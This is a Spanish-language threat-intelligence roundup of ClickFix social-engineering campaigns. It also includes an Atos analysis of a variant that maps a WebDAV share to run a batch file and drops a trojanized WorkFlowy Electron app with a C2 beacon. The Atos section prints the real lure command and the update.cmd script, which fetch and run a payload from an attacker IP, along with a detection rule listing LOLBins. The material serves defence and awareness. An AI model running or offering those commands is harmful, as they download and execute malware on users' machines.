Una nueva campaña ha aprovechado la táctica de ingeniería social de ClickFix como una forma de distribuir un cargador de malware previamente no documentado conocido como Carga profunda.

«Es probable que utilice ofuscación asistida por IA e inyección de procesos para evadir el escaneo estático, mientras que el robo de credenciales comienza inmediatamente y captura contraseñas y sesiones incluso si el cargador principal está bloqueado», afirman los investigadores de ReliaQuest Thassanai McCabe y Andrew Currie. dicho en un informe compartido con The Hacker News.

El punto de partida de la cadena de ataque es un señuelo ClickFix que engaña a los usuarios para que ejecuten comandos de PowerShell pegando el comando en el cuadro de diálogo Ejecutar de Windows con el pretexto de abordar un problema inexistente. Este, a su vez, utiliza «mshta.exe», una utilidad legítima de Windows para descargar y ejecutar un cargador PowerShell ofuscado.

Se ha descubierto que el cargador, por su parte, oculta su funcionalidad real entre asignaciones de variables sin sentido, probablemente en un intento de engañar a las herramientas de seguridad. Se evalúa que los actores de amenazas confiaron en una herramienta de inteligencia artificial (IA) para desarrollar la capa de ofuscación.

DeepLoad hace esfuerzos deliberados para integrarse con la actividad habitual de Windows y pasar desapercibido. Esto incluye ocultar la carga útil dentro de un ejecutable llamado «LockAppHost.exe», un proceso legítimo de Windows que administra la pantalla de bloqueo.

Además, el malware oculta sus propias huellas al desactivar el historial de comandos de PowerShell e invocar directamente las funciones principales nativas de Windows en lugar de depender de los comandos integrados de PowerShell para iniciar procesos y modificar la memoria. Al hacerlo, evita los ganchos de monitoreo comunes que controlan la actividad basada en PowerShell.

«Para evadir la detección basada en archivos, DeepLoad genera un componente secundario sobre la marcha utilizando la característica incorporada de PowerShell Add-Type, que compila y ejecuta código escrito en C#», dijo ReliaQuest. «Esto produce un archivo temporal de biblioteca de vínculos dinámicos (DLL) que se coloca en el directorio Temp del usuario».

Esto ofrece una manera para que el malware eluda las detecciones basadas en nombres de archivos, ya que la DLL se compila cada vez que se ejecuta y se escribe con un nombre de archivo aleatorio.

Otra táctica de evasión de defensa notable adoptada por DeepLoad es el uso de inyección de llamada a procedimiento asincrónico (APC) para ejecutar la carga útil principal dentro de un proceso confiable de Windows sin una carga útil decodificada escrita en el disco después de iniciar el proceso de destino en un estado suspendido, escribir shellcode en su memoria y luego reanudar la ejecución del proceso.

DeepLoad está diseñado para facilitar el robo de credenciales extrayendo las contraseñas del navegador del host. También elimina una extensión de navegador maliciosa que intercepta las credenciales a medida que se ingresan en las páginas de inicio de sesión y persiste en las sesiones de los usuarios a menos que se elimine explícitamente.

Una característica más peligrosa del malware es su capacidad de detectar automáticamente cuando se conectan dispositivos de medios extraíbles, como unidades USB, y copiar los archivos con malware usando nombres como «ChromeSetup.lnk», «Firefox Installer.lnk» y «AnyDesk.lnk» para desencadenar la infección una vez que se hace doble clic.

«DeepLoad utilizó el Instrumental de administración de Windows (WMI) para reinfectar un host ‘limpio’ tres días después sin acción del usuario ni interacción del atacante», explicó ReliaQuest. «WMI cumplió dos propósitos: rompió las cadenas de procesos padre-hijo para las cuales la mayoría de las reglas de detección están diseñadas para detectar, y creó una suscripción de evento WMI que silenciosamente volvió a ejecutar el ataque más tarde».

Al parecer, el objetivo es implementar malware multipropósito que pueda realizar acciones maliciosas a lo largo de la cadena de ciberataque y eludir la detección mediante controles de seguridad al evitar escribir artefactos en el disco, mezclarse con los procesos de Windows y propagarse rápidamente a otras máquinas.

La divulgación viene como G DATA detallado otro cargador de malware denominado Kiss Loader que se distribuye a través de archivos de acceso directo a Internet (URL) de Windows adjuntos a correos electrónicos de phishing, que luego se conecta a un recurso WebDAV remoto alojado en un dominio TryCloudflare para ofrecer un acceso directo secundario que se hace pasar por un documento PDF.

Una vez ejecutado, el acceso directo inicia un script WSH responsable de ejecutar un componente JavaScript, que procede a recuperar y ejecutar un script por lotes que muestra un PDF señuelo, configura la persistencia en la carpeta Inicio y descarga el Kiss Loader basado en Python. En la etapa final, el cargador descifra y ejecuta Venom RAT, una variante de AsyncRAT, usando inyección APC.

Actualmente no se sabe qué tan extendidos están los ataques que implementan Kiss Loader y si se ofrece bajo un modelo de malware como servicio (MaaS). Dicho esto, el actor de amenazas detrás del cargador afirma ser de Malawi.

La operación ransomware conocida como red de fugas ha adoptado la táctica de ingeniería social ClickFix entregada a través de sitios web comprometidos como método de acceso inicial.

El uso de ClickFix, donde se engaña a los usuarios para que ejecuten manualmente comandos maliciosos para solucionar errores inexistentes, es un alejamiento de la dependencia de métodos tradicionales para obtener acceso inicial, como a través de credenciales robadas adquiridas de agentes de acceso inicial (IAB), ReliaQuest. dicho en un informe técnico publicado hoy.

El segundo aspecto importante de estos ataques es el uso de un cargador de comando y control (C2) por etapas integrado en el tiempo de ejecución de JavaScript de Deno para ejecutar cargas útiles maliciosas directamente en la memoria.

«La conclusión clave aquí es que ambas rutas de entrada conducen siempre a la misma secuencia repetible posterior a la explotación», dijo la empresa de ciberseguridad. «Eso les da a los defensores algo concreto con qué trabajar: comportamientos conocidos que pueden detectar e interrumpir en cada etapa, mucho antes de la implementación del ransomware, independientemente de cómo entró LeakNet».

LeakNet surgió por primera vez en noviembre 2024, describiendo como un «vigilante digital» y enmarcando sus actividades como centradas en la libertad y la transparencia en Internet. Según datos captados por dragosel grupo también tiene dirigido entidades industriales.

El uso de ClickFix para atacar a las víctimas ofrece varias ventajas, la más importante es que reduce la dependencia de terceros proveedores, reduce el costo de adquisición por víctima y elimina el cuello de botella operativo de esperar a que cuentas valiosas lleguen al mercado.

En estos ataques, los sitios legítimos pero comprometidos se utilizan para realizar comprobaciones de verificación CAPTCHA falsas que instruyen a los usuarios a copiar y pegar un comando «msiexec.exe» en el cuadro de diálogo Ejecutar de Windows. Los ataques no se limitan a una industria vertical específica, sino que extienden una amplia red para infectar a tantas víctimas como sea posible.

El desarrollo se produce a medida que más actores de amenazas están adoptando el manual ClickFix, ya que abusa de los flujos de trabajo cotidianos y confiables para atraer a los usuarios a ejecutar comandos maliciosos a través de herramientas legítimas de Windows de una manera que parezca rutinaria y segura.

«La adopción de ClickFix por parte de LeakNet marca tanto la primera expansión documentada de la capacidad de acceso inicial del grupo como un cambio estratégico significativo», dijo ReliaQuest.

«Al alejarse de los IAB, LeakNet elimina una dependencia que naturalmente limitaba la rapidez y amplitud con la que podía operar. Y debido a que ClickFix se entrega a través de sitios web legítimos, pero comprometidos, no presenta las mismas señales obvias en la capa de red que la infraestructura propiedad del atacante».

Además del uso de ClickFix para iniciar la cadena de ataque, se evalúa que LeakNet utiliza un cargador basado en Deno para ejecutar JavaScript codificado en Base64 directamente en la memoria para minimizar la evidencia en el disco y evadir la detección. La carga útil está diseñada para tomar huellas dactilares del sistema comprometido, contactar a un servidor externo para buscar malware de la siguiente etapa y entrar en un ciclo de sondeo que busca y ejecuta repetidamente código adicional a través de Deno.

Por otra parte, ReliaQuest dijo que también observó un intento de intrusión en el que los actores de amenazas utilizaron phishing basado en Microsoft Teams para diseñar socialmente a un usuario para que lanzara una cadena de carga útil que terminaba en un cargador similar basado en Deno. Si bien la actividad permanece sin atribuir, el uso del enfoque Bring Your Own Runtime (BYOR) indica una ampliación de los vectores de acceso iniciales de LeakNet o que otros actores de amenazas han adoptado la técnica.

La actividad posterior al compromiso de LeakNet sigue una metodología consistente: comienza con el uso de carga lateral de DLL para lanzar una DLL maliciosa entregada a través del cargador, seguido del movimiento lateral usando PsExec, exfiltración de datos y cifrado.

«LeakNet ejecuta cmd.exe /c klist, un comando integrado de Windows que muestra las credenciales de autenticación activas en el sistema comprometido. Esto le dice al atacante qué cuentas y servicios ya son accesibles sin la necesidad de solicitar nuevas credenciales, para que puedan moverse más rápido y más deliberadamente», dijo ReliaQuest.

«Para la puesta en escena y la exfiltración, LeakNet utiliza depósitos S3, explotando la apariencia del tráfico normal en la nube para reducir su huella de detección».

El desarrollo se produce cuando Google reveló que Qilin (también conocido como Agenda), Akira (también conocido como RedBike), Cl0p, Play, SafePay, INC Ransom, Lynx, RansomHub, DragonForce (también conocido como FireFlame y FuryStorm) y Sinobi emergieron como las 10 principales marcas de ransomware con más víctimas reclamadas en sus sitios de fuga de datos.

«En un tercio de los incidentes, el vector de acceso inicial fue la explotación confirmada o sospechada de vulnerabilidades, con mayor frecuencia en VPN y firewalls comunes», dijo Google Threat Intelligence Group (GTIG) dichoy agregó que el 77% de las intrusiones de ransomware analizadas incluyeron sospecha de robo de datos, un aumento desde el 57% en 2024.

«A pesar de la agitación actual causada por los conflictos y la interrupción de los actores, los actores del ransomware siguen muy motivados y el ecosistema de extorsión demuestra una resiliencia continua. Varios indicadores sugieren que Sin embargo, la rentabilidad general de estas operaciones está disminuyendo, y al menos algunos actores de amenazas están alejando su cálculo de objetivos de las grandes empresas para centrarse en ataques de mayor volumen contra organizaciones más pequeñas».

Se ha descubierto que tres campañas diferentes de ClickFix actúan como vector de entrega para la implementación de un ladrón de información de macOS llamado MacSync.

«A diferencia de los ataques tradicionales basados ​​en exploits, este método se basa completamente en la interacción del usuario, generalmente en forma de copia y ejecución de comandos, lo que lo hace particularmente efectivo contra usuarios que pueden no apreciar las implicaciones de ejecutar comandos de terminal desconocidos y ofuscados», afirman los investigadores de Sophos Jagadeesh Chandraiah, Tonmoy Jitu, Dmitry Samosseiko y Matt Wixey. dicho.

Actualmente no se sabe si las campañas son obra del mismo actor de amenazas. Jamf Threat Labs también señaló el uso de señuelos ClickFix para distribuir el malware en diciembre de 2025. Los detalles de las tres campañas son los siguientes:

• Noviembre de 2025: una campaña que utilizó el navegador OpenAI Atlas como cebo, entregada a través de resultados de búsqueda patrocinados en Google, para dirigir a los usuarios a una URL falsa de Google Sites con un botón de descarga que, al hacer clic, mostraba instrucciones para abrir la aplicación Terminal y pegarle un comando. Esta acción descargó un script de shell, que solicita al usuario que ingrese la contraseña del sistema y ejecuta MacSync con permisos de nivel de usuario.
• Diciembre de 2025: A campaña de publicidad maliciosa que aprovechó enlaces patrocinados vinculados a búsquedas de consultas como «cómo limpiar tu Mac» en Google para llevar a los usuarios a conversaciones compartidas en el sitio legítimo OpenAI ChatGPT para dar la impresión de que los enlaces eran seguros. Las conversaciones de ChatGPT redireccionaban a las víctimas a páginas de inicio maliciosas con temas de GitHub que engañaban a los usuarios para que ejecutaran comandos maliciosos en la aplicación Terminal.
• Febrero de 2026: una campaña dirigida a Bélgica, India y partes de América del Norte y del Sur que distribuyó una nueva variante de MacSync entregada a través de señuelos ClickFix. La última versión admite cargas útiles dinámicas de AppleScript y ejecución en memoria para evadir el análisis estático, evitar detecciones de comportamiento y complicar la respuesta a incidentes.

El script de shell que se inicia después de ejecutar el comando Terminal está diseñado para contactar a un servidor codificado y recuperar la carga útil del ladrón de información AppleScript, al mismo tiempo que toma medidas para eliminar evidencia de robo de datos. El ladrón está equipado para recopilar una amplia gama de datos de hosts comprometidos, incluida la exfiltración de credenciales, archivos, bases de datos de llaveros y frases iniciales de billeteras de criptomonedas.

Los últimos hallazgos sugieren que los actores de amenazas están adaptando la fórmula para estar un paso por delante de las herramientas de seguridad, mientras utilizan como arma la confianza asociada con las conversaciones ChatGPT para convencer a los usuarios de que ejecuten comandos maliciosos.

La nueva variante observada en la campaña más reciente «probablemente representa que el desarrollador de malware se ajusta al sistema operativo y a las medidas de seguridad del software para mantener la efectividad», dijo Sophos. «Por lo tanto, las mejoras en las tácticas típicas de ingeniería social de ClickFix son una forma en que este tipo de campañas pueden seguir evolucionando en el futuro».

En los últimos meses, las campañas de ClickFix han utilizado plataformas legítimas como Cloudflare Pages (pages.dev), Squarespace y Tencent EdgeOne para albergar instrucciones falsas para instalar herramientas de desarrollo como Claude Code de Anthropic. Las URL se distribuyen a través de anuncios maliciosos en motores de búsqueda.

Las instrucciones, como antes, engañan a las víctimas haciéndoles instalar malware de robo de información como Amatera Stealer en su lugar. El ataque de ingeniería social tiene un nombre en clave InstalarReparar o GoogleReparar. Según Nati Tal, directora de Guardio Labs, cadenas de infección similares conducen a la implementación de Alien infostealer en Windows y Atomic Stealer en macOS.

El comando de PowerShell ejecutado después de pegar y ejecutar el supuesto comando de instalación de Claude Code recupera un paquete de extensión de Chrome legítimo dentro de un archivo de aplicación HTML (HTA) malicioso, que luego inicia un cargador .NET ofuscado para Alien en la memoria, según Tal.

«Mientras que los ataques tradicionales de ClickFix necesitan crear una razón para que el usuario ejecute un comando: un CAPTCHA falso, un mensaje de error inventado, un aviso del sistema falso, InstallFix no necesita nada de eso», dijo Push Security. «El pretexto es simplemente que el usuario quiere instalar software legítimo».

Según Pillar Security, ha habido al menos 20 campañas de malware distintas dirigidas a inteligencia artificial (IA) y herramientas de codificación de vibraciones entre febrero y marzo de 2026. Estas incluyen editores de código, agentes de IA, plataformas de modelos de lenguaje grandes (LLM), extensiones de navegador con tecnología de IA, generadores de video de IA y herramientas comerciales de IA. De estos, se ha descubierto que nueve se dirigen tanto a Windows como a macOS, y otros siete afectan exclusivamente a los usuarios de macOS.

«La razón es clara: los usuarios de herramientas de codificación AI/vibe se inclinan en gran medida hacia macOS, y los usuarios de macOS tienden a tener credenciales de mayor valor (claves SSH, tokens de nube, billeteras de criptomonedas)», Eilon Cohen, investigador de Pillar Security dicho.

«La técnica ClickFix/InstallFix (engañar a los usuarios para que peguen comandos en la Terminal) es excepcionalmente efectiva contra los desarrolladores porque curl | sh es un patrón de instalación legítimo. Homebrew, Rust, nvm y muchas otras herramientas de desarrollo usan este patrón exacto. Los comandos maliciosos se esconden a plena vista».

No hace falta decir que la ventaja que plantea ClickFix (y sus variantes) ha llevado a que múltiples actores y grupos de amenazas adopten la táctica. Esto incluye un sistema de distribución de tráfico malicioso (TDS) llamado KongTuke (también conocido como 404 TDS, Chaya_002, LandUpdate808 y TAG-124), que utiliza sitios web de WordPress comprometidos y señuelos CAPTCHA falsos para entregar un troyano basado en Python llamado ModeloRAT.

Los atacantes inyectan JavaScript malicioso en sitios web legítimos de WordPress que solicitan a los usuarios que ejecuten un comando de PowerShell responsable de iniciar un proceso de infección de varias etapas para implementar el troyano.

«El grupo continúa utilizando este método junto con la nueva técnica CrashFix, que engaña a los usuarios para que instalen una extensión de navegador maliciosa para iniciar la infección», dijo Trend Micro. «El malware comprueba específicamente si un sistema es parte de un dominio corporativo e identifica las herramientas de seguridad instaladas antes de continuar, lo que sugiere centrarse en entornos empresariales en lugar de infecciones oportunistas».

Eso no es todo. También se han realizado campañas de KongTuke. manchado utilizando registros DNS TXT en su script ClickFix. Estos registros TXT de DNS presentan un comando para recuperar y ejecutar un script de PowerShell.

Otros ataques de secuestro de pasta estilo ClickFix que se han detectado en la naturaleza se enumeran a continuación:

• Usando sitios web comprometidos para mostrar señuelos para páginas ClickFix que imiten el mensaje «¡Aw Snap!» de Google. errores o actualizaciones del navegador para distribuir droppers, descargadores y extensiones de navegador maliciosas.
• Usando Señuelos ClickFix servido a través de enlaces de publicidad maliciosa/phishing para dirigir a los usuarios a páginas maliciosas que conducen a la implementación de Remcos RAT.
• Usando un señuelo de verificación CAPTCHA falso en un sitio web falso que promociona una estafa de lanzamiento aéreo de $TEMU para desencadenar la ejecución de un comando de PowerShell que ejecuta código Python arbitrario recuperado de un servidor.
• Usando un Publicidad falsa en sitios web CleanMyMac para engañar a los usuarios para que ejecuten un comando de Terminal malicioso para implementar un ladrón de macOS llamado SHub Stealer y billeteras de criptomonedas de puerta trasera como Exodus, Atomic Wallet, Ledger Wallet y Ledger Live para robar las frases iniciales.
• Usando un señuelo de verificación CAPTCHA falso en sitios web comprometidos para ejecutar un script de PowerShell que entrega un cuentagotas MSI, que luego instala el tiempo de ejecución de JavaScript de Deno para ejecutar código ofuscado que finalmente instala CastleRAT en la memoria mediante un cargador de Python llamado CastleLoader.

En un informe publicado la semana pasada, Rapid7 reveló que los sitios web de WordPress de alta confianza están siendo comprometidos como parte de una campaña generalizada y en curso diseñada para inyectar un implante ClickFix que se hace pasar por un desafío de verificación humana de Cloudflare. La actividad está activa desde diciembre de 2025.

Se han identificado más de 250 sitios web infectados en al menos 12 países, incluidos Australia, Brasil, Canadá, Chequia, Alemania, India, Israel, Singapur, Eslovaquia, Suiza, el Reino Unido y Estados Unidos. Los sitios web han sido identificados como medios de comunicación regionales y empresas locales.

El objetivo final de estos señuelos es comprometer los sistemas Windows con diferentes familias de malware ladrón: Ladrón StealCuna versión mejorada de Vidar Stealer, un ladrón de .NET denominado Impure Stealer y un ladrón de C++ denominado VodkaStealer. Los datos robados pueden actuar como plataforma de lanzamiento para robos financieros o ataques posteriores.

Actualmente se desconoce el método exacto mediante el cual se piratean los sitios de WordPress. Sin embargo, se sospecha que implica la explotación de fallas de seguridad reveladas recientemente en complementos y temas de WordPress, credenciales de administrador previamente robadas o interfaces de administración de wp de acceso público.

Para contrarrestar la amenaza, se recomienda a los administradores de sitios que mantengan sus sitios actualizados, utilicen contraseñas seguras para el acceso administrativo, configuren la autenticación de dos factores (2FA) y busquen cuentas de administrador sospechosas.

«La mejor defensa para las personas que navegan por la web es ser cautelosos, mantener una mentalidad de confianza cero, utilizar software de seguridad confiable y mantenerse actualizados con las últimas tácticas de phishing y ClickFix utilizadas por actores maliciosos», dijo Rapid7. «Una conclusión importante de este informe debería ser que incluso los sitios web confiables pueden verse comprometidos y utilizados como armas contra visitantes desprevenidos».

Descargo de responsabilidad: Este informe ha sido elaborado por el Centro de Investigación de Amenazas para mejorar la concienciación sobre la ciberseguridad y apoyar el fortalecimiento de las capacidades de defensa. Se basa en investigaciones y observaciones independientes del panorama de amenazas actual disponibles en el momento de la publicación. El contenido está destinado únicamente a fines informativos y de preparación.

Lea más blogs sobre inteligencia de amenazas e investigación de adversarios: https://atos.net/es/lp/cybershield

Resumen

Los investigadores de Atos identificaron una nueva variante de la popular técnica ClickFix, donde los atacantes convencen al usuario para que ejecute un comando malicioso en su propio dispositivo a través del acceso directo Win + R. En esta variación, se utiliza un comando «net use» para asignar una unidad de red desde un servidor externo, después de lo cual se ejecuta un archivo por lotes «.cmd» alojado en esa unidad. El script descarga un archivo ZIP, lo descomprime y ejecuta la aplicación WorkFlowy legítima con una lógica maliciosa modificada oculta dentro del archivo «.asar». Esto actúa como una baliza C2 y un gotero para la carga útil final del malware.

Figura 1: descripción general de alto nivel del flujo de ataques.

Descripción general del ataque

En esta versión, el vector de ataque inicial es el mismo que en todas las demás, una página web que se hace pasar por un mecanismo captcha – “happyglamper[.]ro». Solicita al usuario que abra la aplicación Ejecutar mediante «Win+R», seguido de «Ctrl+V» y «Enter».

Figura 2: Sitio web de phishing 1

Figura 3: Sitio web de phishing 2

Esto ejecuta el siguiente comando:

“cmd.exe” /c net use Z: https://94.156.170[.]255/webdav /persistent:no && “Z:\update.cmd” & net use Z: /delete

Normalmente, en esta etapa, los atacantes han utilizado PowerShell o mshta para descargar y ejecutar la siguiente etapa del malware. Aquí, en cambio, podemos ver que el «uso de red» se utiliza para asignar y conectarse a una unidad de red de un servidor externo desde el cual se ejecuta un script por lotes. Si bien no son novedosos, estos TTP nunca antes se habían visto en ataques ClickFix. Combinada con las siguientes etapas poco comunes de patrones de infección, esta campaña brinda a los adversarios altas posibilidades de evadir los controles defensivos y permanecer fuera del radar de los defensores.

En este caso, la variante ClickFix observada del flujo de ejecución evitó con éxito la detección de Microsoft Defender para Endpoint. Los equipos de seguridad de Atos pudieron detectarlo solo gracias al servicio interno Threat Hunting, que se centró en el principal aspecto de comportamiento de la técnica ClickFix: la ejecución inicial a través de la clave de registro RunMRU (consulta de caza disponible en la sección Apéndice).

El script de ejecución inicial “update.cmd” se carga desde la unidad asignada y se ejecuta; después de eso, se elimina la unidad asignada. Contenido de “update.cmd”:

start "" /min powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://94.156.170[.]255/flowy.zip' -OutFile \"$env:TEMP\dl.zip\";
Expand-Archive \"$env:TEMP\dl.zip\" -DestinationPath \"$env:LOCALAPPDATA\MyApp\" -Force;
Start-Process \"$env:LOCALAPPDATA\MyApp\WorkFlowy.exe\""

Esto genera una instancia de PowerShell que descarga un archivo zip y lo extrae en el directorio “%LOCALAPPDATA%\MyApp\”. Luego ejecuta el binario “WorkFlowy.exe”.

Figura 4: Contenido del archivo flowy.zip

Análisis de flujo de trabajo

El archivo contiene una aplicación de escritorio WorkFlowy (versión 1.4.1050), firmada por el desarrollador “FunRoutine Inc.”, distribuida como un paquete de aplicaciones Electron. Las aplicaciones de Electron se escriben utilizando tecnologías web populares (HTML, CSS y JavaScript) y utilizan archivos «.asar» para empaquetar el código fuente durante el empaquetado de la aplicación. Se hace por varias razones, como mitigar problemas relacionados con nombres de rutas largos en Windows. El código malicioso se inyectó en main.js, el punto de entrada de Node.js de la aplicación, oculto dentro del archivo app.asar.

Perfil Técnico

Vector de infección

El archivo malicioso ASAR es un reemplazo directo del legítimo resources/app.asar. El atacante volvió a empaquetar una versión anterior de la aplicación (v1.4 frente a la v4.3 actual) con código inyectado.

Figura 5: Contenido del subdirectorio «recursos»

Código malicioso (gotero/baliza)

Cuando se ejecuta WorkFlowy, busca el archivo app.asar en la ruta relativa codificada en el binario. Luego lee el archivo main.js desde su interior, lo decodifica en una cadena y lo analiza en el motor JavaScript V8 de Google integrado, que lo ejecuta. Los atacantes han reemplazado el main.js legítimo por uno que ellos mismos han creado. En lugar de scripts bien estructurados, han utilizado una estructura en línea muy ofuscada, agregando código malicioso encima del legítimo, asegurando que se ejecute primero y bloqueando la funcionalidad WorkFlowy.

El código malicioso contiene varias funciones críticas:

1. El malware se ejecuta antes de que se inicie la aplicación legítima: El IIFE inyectado se abre con await f(), el bucle infinito de baliza C2. Debido a que f() nunca se resuelve, todo el código de inicialización legítimo de WorkFlowy que sigue se bloquea permanentemente. El malware se ejecuta con privilegios completos de Node.js inmediatamente después del lanzamiento.

2. Toma de huellas dactilares persistente de la víctima a través de %APPDATA%\id.txt: En la primera ejecución se genera un ID alfanumérico aleatorio de 8 caracteres y se escribe en %APPDATA%\id.txt. En ejecuciones posteriores, la identificación almacenada se vuelve a leer, lo que le brinda al atacante un identificador estable para cada máquina víctima en todas las sesiones.

3. Baliza C2: extrae la identidad del host cada 2 segundos: La función u() envía una POST HTTP que contiene la identificación única de la víctima, el nombre de la máquina y el nombre de usuario de Windows al servidor C2. El bucle en f() repite esto indefinidamente con un intervalo de 2 segundos.

4. Descarga y ejecución remota de carga útil: La función p() recibe un objeto de tarea del C2, decodifica el contenido del archivo codificado en base64, lo escribe en un directorio con marca de tiempo en %TEMP% y ejecuta cualquier .exe a través de child_process.exec.

Si no se establece la conexión C2, no se generan archivos ni directorios. En el momento de realizar este análisis, el dominio C2 ya no respondía.

Por qué Electron es un mecanismo de entrega eficaz

El código malicioso se ejecuta en el proceso principal de Node.js, fuera del entorno limitado de Chromium, con todos los privilegios del usuario que ha iniciado sesión, lo que permite que el código malicioso ejecute cualquier acción que el usuario pueda realizar en el sistema. En realidad, no se escriben archivos en el disco y, dado que la carga útil maliciosa está empaquetada dentro del archivo «.asar», también ayuda a ocultar el código malicioso.

Persistencia

No se implementa ninguna persistencia a nivel del sistema operativo a través del cuentagotas. La baliza se ejecuta solo mientras WorkFlowy está abierto. El único artefacto escrito en el disco antes de la entrega en la siguiente etapa es %APPDATA%\id.txt (ID de seguimiento de la víctima), y eso solo si la conexión a C2 se establece correctamente. Presumiblemente, se delega una persistencia a nivel del sistema operativo a cualquier carga útil que entregue el C2 a través del cuentagotas.

Lea más blogs sobre inteligencia de amenazas e investigación de adversarios: https://atos.net/es/lp/cybershield

Conclusiones clave

Esta variante de ClickFix es importante porque aleja el acceso inicial de los motores de ejecución y secuencias de comandos de los que comúnmente se abusa, como PowerShell, MSHTA y WScript, y en su lugar depende del uso de la red para abusar de WebDAV como mecanismo de entrega. Las campañas anteriores de ClickFix generalmente se exponían al invocar directamente intérpretes o binarios que viven fuera de la tierra y que están fuertemente monitoreados por soluciones EDR modernas. Por el contrario, esta iteración monta un recurso compartido WebDAV remoto como una unidad local, ejecuta un archivo por lotes alojado mediante la semántica estándar del sistema de archivos y elimina la asignación inmediatamente después de su uso. Esto muestra que ClickFix aún evoluciona, expande su arsenal de métodos de ejecución de proxy y comienza a utilizar utilidades de red nativas.

La lógica maliciosa se oculta reemplazando el contenido del archivo app.asar de la aplicación Workflowy con una versión troyanizada de main.js. Debido a que el código se ejecuta dentro del proceso principal de Electron y permanece empaquetado dentro de una aplicación legítima, evita muchas detecciones de comportamiento y basadas en archivos que se centran en cargadores independientes o intérpretes de scripts. Los archivos ASAR rara vez se inspeccionan, lo que permite que la lógica del dropper se ejecute durante el inicio normal de la aplicación con una visibilidad mínima.

Esta actividad no fue detectada por los controles de seguridad y solo se identificó mediante la búsqueda de amenazas dirigida en Atos. La detección se basó en analizar el contexto de ejecución en lugar de los indicadores de carga útil, específicamente buscando ejecuciones de comandos sospechosas que se originaran en el cuadro de diálogo Ejecutar del Explorador (registrado dentro de la clave de registro RunMRU). Esto subraya la creciente importancia de la caza de amenazas como mecanismo de detección complementario: a medida que las campañas de ClickFix cambian hacia utilidades nativas y aplicaciones confiables que generan pocas alertas, sólo la caza proactiva y basada en hipótesis puede ayudar a sacar a la luz estas señales débiles lo suficientemente temprano como para interrumpir la cadena de ataque.

Apéndices

COI

Consulta de caza

• título: Comandos sospechosos ejecutados mediante el cuadro de diálogo Ejecutar
• identificación: 20891a30-032e-4f15-a282-fa4a8b0d8aae
• estado: experimental
• descripción:
• Detecta intérpretes de comandos sospechosos y LOLBins escritos en la clave de registro Explorer RunMRU (comúnmente utilizada para el historial de diálogo de ejecución), con explorer.exe como proceso de inicio.
• autor: CVR
• fecha: 2026-03-05
• etiquetas:
• – ataque.ejecución
• – ataque.t1059
• – ataque.defense_evasion
• fuente de registro:
• categoría: conjunto_registro
• producto: ventanas
• definición: «ID de evento de Sysmon 13 (conjunto de valores de registro) o telemetría de registro EDR equivalente»
• detección:
• clave_selección:
• TargetObject|contiene: ‘\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU’
• proceso_selección:
• Imagen|termina con: ‘\explorer.exe’
• datos_de_selección:
• Detalles|contiene:
• – ‘cmd’
• – ‘powershell’
• – ‘cmd.exe’
• – ‘powershell.exe’
• – ‘wscript.exe ‘
• – ‘cscript.exe ‘
• – ‘net.exe’
• – ‘net1.exe’
• – ‘sh.exe’
• – ‘bash.exe’
• – ‘schtasks.exe’
• – ‘regsvr32.exe’
• – ‘hh.exe’
• – ‘wmic.exe ‘
• – ‘mshta.exe’
• – ‘rundll32.exe’
• – ‘msiexec.exe ‘
• – ‘forfiles.exe ‘
• – ‘scriptrunner.exe’
• – ‘mftrace.exe ‘
• – ‘AppVLP.exe ‘
• – ‘svchost.exe’
• – ‘msbuild.exe’
• condición: clave_selección y proceso_selección y datos_selección
• falsos positivos:
• – «Actividad administrativa legítima utilizando el cuadro de diálogo Ejecutar (Win+R) para ejecutar herramientas integradas».
• – «Scripts de TI o pasos de solución de problemas ejecutados de forma interactiva por un usuario».
• nivel: medio

Lea más blogs sobre inteligencia de amenazas e investigación de adversarios: https://atos.net/es/lp/cybershield

Microsoft reveló el jueves detalles de una nueva campaña generalizada de ingeniería social ClickFix que ha aprovechado la Aplicación de terminal de Windows como una forma de activar una cadena de ataque sofisticada y desplegar el malware Lumma Stealer.

La actividad, observada en febrero de 2026, utiliza el programa emulador de terminal en lugar de indicar a los usuarios que inicien el cuadro de diálogo Ejecutar de Windows y peguen un comando en él.

«Esta campaña instruye a los objetivos a utilizar el acceso directo Windows + X → I para iniciar Windows Terminal (wt.exe) directamente, guiando a los usuarios a un entorno de ejecución de comandos privilegiado que se integra con flujos de trabajo administrativos legítimos y parece más confiable para los usuarios», dijo el equipo de Microsoft Threat Intelligence. dicho en una serie de publicaciones sobre X.

Lo que hace que la última variante sea notable es que elude las detecciones diseñadas específicamente para señalar el abuso en el cuadro de diálogo Ejecutar, sin mencionar el aprovechamiento de la legitimidad de Windows Terminal para engañar a usuarios desprevenidos para que ejecuten comandos maliciosos entregados a través de páginas CAPTCHA falsas, mensajes de solución de problemas u otros señuelos de estilo de verificación.

La cadena de ataque posterior al compromiso también es única: cuando el usuario pega un comando codificado en hexadecimal y comprimido XOR copiado de la página de señuelo ClickFix en una sesión de Terminal de Windows, abarca instancias adicionales de Terminal/PowerShell para finalmente invocar un proceso de PowerShell responsable de decodificar el script.

Esto, a su vez, conduce a la descarga de una carga útil ZIP y un binario 7-Zip legítimo pero renombrado, el último de los cuales se guarda en el disco con un nombre de archivo aleatorio. Luego, la utilidad procede a extraer el contenido del archivo ZIP, lo que desencadena una cadena de ataque de varias etapas que implica los siguientes pasos:

• Recuperando más cargas útiles
• Configurar la persistencia mediante tareas programadas
• Configurar exclusiones de Microsoft Defender
• Exfiltración de datos de la máquina y de la red
• Implementar Lumma Stealer usando una técnica llamada Usuario de colaAPC() inyectando el malware en los procesos «chrome.exe» y «msedge.exe»

«El ladrón apunta a artefactos de navegador de alto valor, incluidos datos web y datos de inicio de sesión, recolectando credenciales almacenadas y exfiltrándolas a la infraestructura controlada por el atacante», dijo Microsoft.

El fabricante de Windows dijo que también detectó una segunda vía de ataque, como parte de la cual, cuando el comando comprimido se pega en la Terminal de Windows, descarga un script por lotes con nombres aleatorios a la carpeta «AppData\Local» mediante «cmd.exe» para escribir un script de Visual Basic en la carpeta Temp (también conocida como %TEMP%).

«El script por lotes luego se ejecuta a través de cmd.exe con el argumento de línea de comando /launched. El mismo script por lotes luego se ejecuta a través de MSBuild.exe, lo que resulta en un abuso de LOLBin», agregó. «El script se conecta a los puntos finales RPC de Crypto Blockchain, lo que indica una técnica de ocultación de ether. También realiza una inyección de código basada en QueueUserAPC() en los procesos chrome.exe y msedge.exe para recolectar datos web y datos de inicio de sesión».